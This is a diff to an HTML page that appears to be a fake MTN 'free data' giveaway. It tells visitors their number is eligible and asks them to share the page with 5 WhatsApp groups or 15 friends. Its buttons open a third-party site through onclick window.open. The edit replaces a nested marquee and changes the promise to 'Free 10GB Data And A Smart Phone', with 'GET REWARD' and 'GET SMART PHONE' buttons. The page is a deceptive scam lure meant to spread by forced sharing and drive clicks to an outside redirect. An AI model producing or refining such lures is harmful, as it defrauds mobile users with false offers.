--- a/Mtn-Chosen-Number.html
+++ b/Mtn-Chosen-Number.html
@@ -360,13 +360,9 @@ button:hover {
   
                    
   <center>
-  <marquee
-  direction="down"
-  width="500"
-  height="100"
-  behavior="alternate">
+  
     <marquee behavior="alternate"> <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbWHm6bE4hMQHMtiENHtFO9dvjfV43-Wf51RhPfY_JT_NiMCUfeXji-k-2COlu5-RrIO6o6UY7rETxGGMHZpluY6NfKvWUSvQxfRqQy1UUZJLZk8j6K1c6hnmkYJcRnTbVDoUhZHx67DioAK_4zwEJWoiDKG3ioP3WsqRV2lbe1R2RhvrOuV6QRuKUbGNf/w640-h584/IMG_6571.jpeg" alt="Free-Data" style="width: 40%;"> </marquee>
-</marquee>
+
   
   </center>
 
@@ -444,7 +440,7 @@ button:hover {
 
             <p class="tip"> Congratulations, your MTN Number <span id="getname"></span>،</p>
             <p class="tip">
-                is Eligible to receive Free Data Offer <span class="amount"> Proceed to Activate your Free Data</span><br>
+                is Eligible to receive Free 10GB Data Offer And A Smart Phone <span class="amount"> Proceed to Activate your Free Data</span><br>
               How to proceed:
             </p><br>
             <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
@@ -467,7 +463,7 @@ button:hover {
             <p class="title"> Click "ACTIVATE" to activate your Data </p>
            <br/>
           <a  onclick="window.open('https://thaudray.com/4/3077182')" href="https://africa-day-mtn-celebration.blogspot.com/#1724175979228" >
-                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#FFCD05">ACTIVATE 5GB</font></button>
+                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#FFCD05">GET REWARD</font></button>
                     </a><br/>
           
        <a  onclick="window.open('https://thaudray.com/4/3077182')" href="https://africa-day-mtn-celebration.blogspot.com/#1724175979228" >
@@ -476,7 +472,7 @@ button:hover {
              <br/>
 
               <a  onclick="window.open('https://thaudray.com/4/3077182')" href="https://africa-day-mtn-celebration.blogspot.com/#1724175979228" >
-                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#FFCD05">ACTIVATE 50GB</font></button>
+                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#FFCD05">GET SMART PHONE</font></button>
                     </a>
              <br/>
 
